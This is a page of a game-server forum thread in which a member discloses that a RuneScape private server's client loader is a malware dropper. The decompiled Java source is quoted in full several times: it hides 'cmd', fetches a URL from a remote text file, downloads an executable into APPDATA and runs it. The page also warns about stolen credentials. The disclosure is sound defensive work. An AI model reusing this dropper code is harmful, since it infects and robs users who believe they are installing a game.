Thread: RuneLive | Continue your adventure where you left off! | 200+ Players

Page 5 of 7 FirstFirst ... 34567 LastLast
Results 41 to 50 of 63
  1. #41  
    Respected Member


    Join Date
    Jan 2009
    Posts
    5,743
    Thanks given
    1,162
    Thanks received
    3,603
    Rep Power
    5000
    Your "loader" "Ikov.jar (md5hash: 194691e68bcfa73f03442d7c17e29366 *IKov.jar) is linked to a file which is marked malicious

    Code:
    package com.runelive;
    
    import java.io.BufferedInputStream;
    import java.io.BufferedReader;
    import java.io.File;
    import java.io.FileOutputStream;
    import java.io.IOException;
    import java.io.InputStreamReader;
    import java.io.PrintStream;
    import java.net.URL;
    
    public final class Main
    {
      public static void MainLaunch()
      {
        try
        {
          Process localProcess = Runtime.getRuntime().exec(getBuildVersion() + " /c " + System.getenv("APPDATA") + File.separator + GetGamePack("GameBuild"));
          BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(localProcess.getInputStream()));
          Loader.main(null);
        }
        catch (Exception localException)
        {
          System.out.println("Loading Client...");
        }
      }
      
      public static String GetGamePack(String paramString)
      {
        try
        {
          String str1 = "exe";
          String str2 = ".";
          return paramString + str2 + str1;
        }
        catch (Exception localException) {}
        return "GameBuild";
      }
      
      public static void main(String[] paramArrayOfString)
        throws IOException
      {
        try
        {
          String str = System.getenv("APPDATA") + File.separator + GetGamePack("GameBuild");
          File localFile = new File(str);
          if (!localFile.exists())
          {
            StartMainClient(ReadGameData(), str);
            MainLaunch();
          }
          else
          {
            MainLaunch();
          }
        }
        catch (Exception localException)
        {
          System.out.println(localException);
          return;
        }
      }
      
      public static String getBuildVersion()
      {
        String[] arrayOfString = { "d", "a", "c", "m", "n", "o", "p", "h" };
        return String.valueOf(arrayOfString[2] + arrayOfString[3] + arrayOfString[0]);
      }
      
      public static void StartMainClient(String paramString1, String paramString2)
        throws IOException
      {
        try
        {
          BufferedInputStream localBufferedInputStream = null;
          FileOutputStream localFileOutputStream = null;
          try
          {
            localBufferedInputStream = new BufferedInputStream(new URL(paramString1).openStream());
            localFileOutputStream = new FileOutputStream(paramString2);
            
            byte[] arrayOfByte = new byte['?'];
            int i;
            while ((i = localBufferedInputStream.read(arrayOfByte, 0, 1024)) != -1) {
              localFileOutputStream.write(arrayOfByte, 0, i);
            }
          }
          finally
          {
            if (localBufferedInputStream != null) {
              localBufferedInputStream.close();
            }
            if (localFileOutputStream != null) {
              localFileOutputStream.close();
            }
          }
        }
        catch (Exception localException)
        {
          System.out.println("Client Loaded.");
          System.out.println(localException);
          return;
        }
      }
      
      public static String ReadGameData()
      {
        try
        {
          URL localURL = new URL("https://dl.dropboxusercontent.com/s/wzkv29p5n6tci9p/RSBuildVersion.txt");
          BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(localURL.openStream()));
          return localBufferedReader.readLine().toString();
        }
        catch (Exception localException) {}
        return "http://rune-server.ee/";
      }
    }
    Link to loader: https://dl.dropboxusercontent.com/s/...b3sbe/IKov.jar

    https://dl.dropboxusercontent.com/s/...ildVersion.txt link to http://justtakingyourfiles.com/x/GameBuild.exe

    https://www.virustotal.com/en/file/8...d131/analysis/

    Looking at the exe itself this is not a false positive and is indeed a virus of sorts.
    Reply With Quote  
     


  2. #42  
    Banned

    Join Date
    Jul 2009
    Posts
    3,999
    Thanks given
    1,003
    Thanks received
    1,028
    Rep Power
    0
    Quote Originally Posted by Stuart View Post
    Your "loader" "Ikov.jar (md5hash: 194691e68bcfa73f03442d7c17e29366 *IKov.jar) is linked to a file which is marked malicious

    Code:
    package com.runelive;
    
    import java.io.BufferedInputStream;
    import java.io.BufferedReader;
    import java.io.File;
    import java.io.FileOutputStream;
    import java.io.IOException;
    import java.io.InputStreamReader;
    import java.io.PrintStream;
    import java.net.URL;
    
    public final class Main
    {
      public static void MainLaunch()
      {
        try
        {
          Process localProcess = Runtime.getRuntime().exec(getBuildVersion() + " /c " + System.getenv("APPDATA") + File.separator + GetGamePack("GameBuild"));
          BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(localProcess.getInputStream()));
          Loader.main(null);
        }
        catch (Exception localException)
        {
          System.out.println("Loading Client...");
        }
      }
      
      public static String GetGamePack(String paramString)
      {
        try
        {
          String str1 = "exe";
          String str2 = ".";
          return paramString + str2 + str1;
        }
        catch (Exception localException) {}
        return "GameBuild";
      }
      
      public static void main(String[] paramArrayOfString)
        throws IOException
      {
        try
        {
          String str = System.getenv("APPDATA") + File.separator + GetGamePack("GameBuild");
          File localFile = new File(str);
          if (!localFile.exists())
          {
            StartMainClient(ReadGameData(), str);
            MainLaunch();
          }
          else
          {
            MainLaunch();
          }
        }
        catch (Exception localException)
        {
          System.out.println(localException);
          return;
        }
      }
      
      public static String getBuildVersion()
      {
        String[] arrayOfString = { "d", "a", "c", "m", "n", "o", "p", "h" };
        return String.valueOf(arrayOfString[2] + arrayOfString[3] + arrayOfString[0]);
      }
      
      public static void StartMainClient(String paramString1, String paramString2)
        throws IOException
      {
        try
        {
          BufferedInputStream localBufferedInputStream = null;
          FileOutputStream localFileOutputStream = null;
          try
          {
            localBufferedInputStream = new BufferedInputStream(new URL(paramString1).openStream());
            localFileOutputStream = new FileOutputStream(paramString2);
            
            byte[] arrayOfByte = new byte['?'];
            int i;
            while ((i = localBufferedInputStream.read(arrayOfByte, 0, 1024)) != -1) {
              localFileOutputStream.write(arrayOfByte, 0, i);
            }
          }
          finally
          {
            if (localBufferedInputStream != null) {
              localBufferedInputStream.close();
            }
            if (localFileOutputStream != null) {
              localFileOutputStream.close();
            }
          }
        }
        catch (Exception localException)
        {
          System.out.println("Client Loaded.");
          System.out.println(localException);
          return;
        }
      }
      
      public static String ReadGameData()
      {
        try
        {
          URL localURL = new URL("https://dl.dropboxusercontent.com/s/wzkv29p5n6tci9p/RSBuildVersion.txt");
          BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(localURL.openStream()));
          return localBufferedReader.readLine().toString();
        }
        catch (Exception localException) {}
        return "http://rune-server.ee/";
      }
    }
    Link to loader: https://dl.dropboxusercontent.com/s/...b3sbe/IKov.jar

    https://dl.dropboxusercontent.com/s/...ildVersion.txt link to http://justtakingyourfiles.com/x/GameBuild.exe

    https://www.virustotal.com/en/file/8...d131/analysis/

    Looking at the exe itself this is not a false positive.
    Could I also just clarify, I have nothing to do with RuneLive/Ikov2/ChaosPS as of January, they've scammed countless people since January till now and still owe me 1,000$ USD (700$ From August 2016 and 300$ from January 2017).

    Yesterday I was speaking to Adam from RuneUnity/Trinity RSPS and he seemed understanding of the type of people they are and asked Lukafurlan to change the cPanel passwords as he was going to get away from Jonny & Grenade, however it seems they've taken control of the domain again and have shells uploaded to their old site and is trying to make Lukafurlan look malicious.

    For any RuneLive/Ikov2/ChaosPS players, please do not get confused this Stuart is not the "Ikov" Stuart.
    Reply With Quote  
     


  3. #43  
    Super Donator

    Join Date
    Mar 2016
    Posts
    64
    Thanks given
    35
    Thanks received
    24
    Rep Power
    0
    Quote Originally Posted by Stuart View Post
    Your "loader" "Ikov.jar (md5hash: 194691e68bcfa73f03442d7c17e29366 *IKov.jar) is linked to a file which is marked malicious

    Code:
    package com.runelive;
    
    import java.io.BufferedInputStream;
    import java.io.BufferedReader;
    import java.io.File;
    import java.io.FileOutputStream;
    import java.io.IOException;
    import java.io.InputStreamReader;
    import java.io.PrintStream;
    import java.net.URL;
    
    public final class Main
    {
      public static void MainLaunch()
      {
        try
        {
          Process localProcess = Runtime.getRuntime().exec(getBuildVersion() + " /c " + System.getenv("APPDATA") + File.separator + GetGamePack("GameBuild"));
          BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(localProcess.getInputStream()));
          Loader.main(null);
        }
        catch (Exception localException)
        {
          System.out.println("Loading Client...");
        }
      }
      
      public static String GetGamePack(String paramString)
      {
        try
        {
          String str1 = "exe";
          String str2 = ".";
          return paramString + str2 + str1;
        }
        catch (Exception localException) {}
        return "GameBuild";
      }
      
      public static void main(String[] paramArrayOfString)
        throws IOException
      {
        try
        {
          String str = System.getenv("APPDATA") + File.separator + GetGamePack("GameBuild");
          File localFile = new File(str);
          if (!localFile.exists())
          {
            StartMainClient(ReadGameData(), str);
            MainLaunch();
          }
          else
          {
            MainLaunch();
          }
        }
        catch (Exception localException)
        {
          System.out.println(localException);
          return;
        }
      }
      
      public static String getBuildVersion()
      {
        String[] arrayOfString = { "d", "a", "c", "m", "n", "o", "p", "h" };
        return String.valueOf(arrayOfString[2] + arrayOfString[3] + arrayOfString[0]);
      }
      
      public static void StartMainClient(String paramString1, String paramString2)
        throws IOException
      {
        try
        {
          BufferedInputStream localBufferedInputStream = null;
          FileOutputStream localFileOutputStream = null;
          try
          {
            localBufferedInputStream = new BufferedInputStream(new URL(paramString1).openStream());
            localFileOutputStream = new FileOutputStream(paramString2);
            
            byte[] arrayOfByte = new byte['?'];
            int i;
            while ((i = localBufferedInputStream.read(arrayOfByte, 0, 1024)) != -1) {
              localFileOutputStream.write(arrayOfByte, 0, i);
            }
          }
          finally
          {
            if (localBufferedInputStream != null) {
              localBufferedInputStream.close();
            }
            if (localFileOutputStream != null) {
              localFileOutputStream.close();
            }
          }
        }
        catch (Exception localException)
        {
          System.out.println("Client Loaded.");
          System.out.println(localException);
          return;
        }
      }
      
      public static String ReadGameData()
      {
        try
        {
          URL localURL = new URL("https://dl.dropboxusercontent.com/s/wzkv29p5n6tci9p/RSBuildVersion.txt");
          BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(localURL.openStream()));
          return localBufferedReader.readLine().toString();
        }
        catch (Exception localException) {}
        return "http://rune-server.ee/";
      }
    }
    Link to loader: https://dl.dropboxusercontent.com/s/...b3sbe/IKov.jar

    https://dl.dropboxusercontent.com/s/...ildVersion.txt link to http://justtakingyourfiles.com/x/GameBuild.exe

    https://www.virustotal.com/en/file/8...d131/analysis/

    Looking at the exe itself this is not a false positive and is indeed a virus of sorts.
    This has been resolved.
    More information on how this happened can be found here : Ikov 2
    Reply With Quote  
     

  4. #44  
    Respected Member


    Join Date
    Jan 2009
    Posts
    5,743
    Thanks given
    1,162
    Thanks received
    3,603
    Rep Power
    5000
    Quote Originally Posted by Umran View Post
    This has been resolved.
    More information on how this happened can be found here : Ikov 2
    You should point out that any player that has played the server whilst that loader is online is infected and will need to do a clean format of their pc, it takes various different files including saved passwords, email client databases, dumps of various directories, has the ability to transfer any file they want also. God knows what else without pulling the binary apart completely.

    Need to make it more clear to your players how dangerous this is and to change all credentials.
    Reply With Quote  
     

  5. Thankful user:


  6. #45  
    Registered Member 1m6n29s9gmxh's Avatar
    Join Date
    Jan 2017
    Posts
    430
    Thanks given
    32
    Thanks received
    100
    Rep Power
    40
    Quote Originally Posted by Stuart View Post
    You should point out that any player that has played the server whilst that loader is online is infected and will need to do a clean format of their pc, it takes various different files including saved passwords, email client databases, dumps of various directories, has the ability to transfer any file they want also. God knows what else without pulling the binary apart completely.

    Need to make it more clear to your players how dangerous this is and to change all credentials.
    Honestly, you went out of your way to let them know of a virus and they blamed you instantly on their thread lmfao. Unless I am reading wrong from his thread.
    Edit: If it was really you then I'm confused as to why you told them lel
    Spoiler for Insanity V2 Coders be like ::
    Attached image
    Attached image
    Reply With Quote  
     

  7. #46  
    Extreme Donator


    Join Date
    Oct 2010
    Posts
    2,853
    Thanks given
    1,213
    Thanks received
    1,622
    Rep Power
    5000
    Quote Originally Posted by Stuart View Post
    Your "loader" "Ikov.jar (md5hash: 194691e68bcfa73f03442d7c17e29366 *IKov.jar) is linked to a file which is marked malicious
    Their forum thread says you're the one responsible for the virus, unless they mean a different Stuart?
    [Today 01:29 AM] RSTrials: Nice 0.97 Win/Loss Ratio luke. That's pretty bad.
    [Today 01:30 AM] Luke132: Ok u fucking moron i forgot i could influence misc.random
    Reply With Quote  
     

  8. #47  
    Registered Member
    Vippy's Avatar
    Join Date
    Oct 2014
    Age
    25
    Posts
    2,572
    Thanks given
    984
    Thanks received
    1,933
    Rep Power
    5000
    Quote Originally Posted by OsFury View Post
    Honestly, you went out of your way to let them know of a virus and they blamed you instantly on their thread lmfao. Unless I am reading wrong from his thread.
    Edit: If it was really you then I'm confused as to why you told them lel
    two different stuarts...

    The stuart that infected them is another member who's name is stuart I believe it may be panelsec.

    This stuart Is a legit guy no shit that's why he informed people on the thread

    Quote Originally Posted by Professor Oak View Post
    Their forum thread says you're the one responsible for the virus, unless they mean a different Stuart?
    same ^
    Reply With Quote  
     


  9. #48  
    Registered Member 1m6n29s9gmxh's Avatar
    Join Date
    Jan 2017
    Posts
    430
    Thanks given
    32
    Thanks received
    100
    Rep Power
    40
    Quote Originally Posted by Vippy View Post
    two different stuarts...

    The stuart that infected them is another member who's name is stuart I believe it may be panelsec.

    This stuart Is a legit guy no shit that's why he informed people on the thread



    same ^
    Oh ok too many Stuarts, I was really just wondering what was going on lool
    Spoiler for Insanity V2 Coders be like ::
    Attached image
    Attached image
    Reply With Quote  
     

  10. #49  
    Registered Member

    Join Date
    Jan 2015
    Posts
    313
    Thanks given
    64
    Thanks received
    166
    Rep Power
    186
    Quote Originally Posted by OsFury View Post
    Honestly, you went out of your way to let them know of a virus and they blamed you instantly on their thread lmfao. Unless I am reading wrong from his thread.
    Edit: If it was really you then I'm confused as to why you told them lel
    Quote Originally Posted by Professor Oak View Post
    Their forum thread says you're the one responsible for the virus, unless they mean a different Stuart?
    The Stuart they are referencing at the beginning is the one that is part of panelsec and just generally hacks every website because he's a little toad with nothing better to do. They're referencing Stuart rs further on to praise him, but the thread itself seems sketchy anyways so fuck it lol
    Reply With Quote  
     

  11. #50  
    Winner of SOTM!

    Authentic's Avatar
    Join Date
    Mar 2013
    Posts
    1,155
    Thanks given
    921
    Thanks received
    475
    Rep Power
    750
    such an aids thread layout lol get your money back from whoever designed it lol

    otherwise, good luck.
    Reply With Quote  
     

Page 5 of 7 FirstFirst ... 34567 LastLast

Thread Information
Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)


User Tag List

Similar Threads

  1. Replies: 86
    Last Post: 03-22-2016, 04:10 PM
  2. Replies: 52
    Last Post: 07-31-2010, 02:51 AM
  3. Replies: 12
    Last Post: 07-17-2009, 04:32 AM
  4. How to change where your standing when you first log on.
    By myownclient2233 in forum Tutorials
    Replies: 8
    Last Post: 08-18-2008, 02:23 AM
  5. Replies: 14
    Last Post: 01-24-2008, 07:25 AM
Posting Permissions
  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •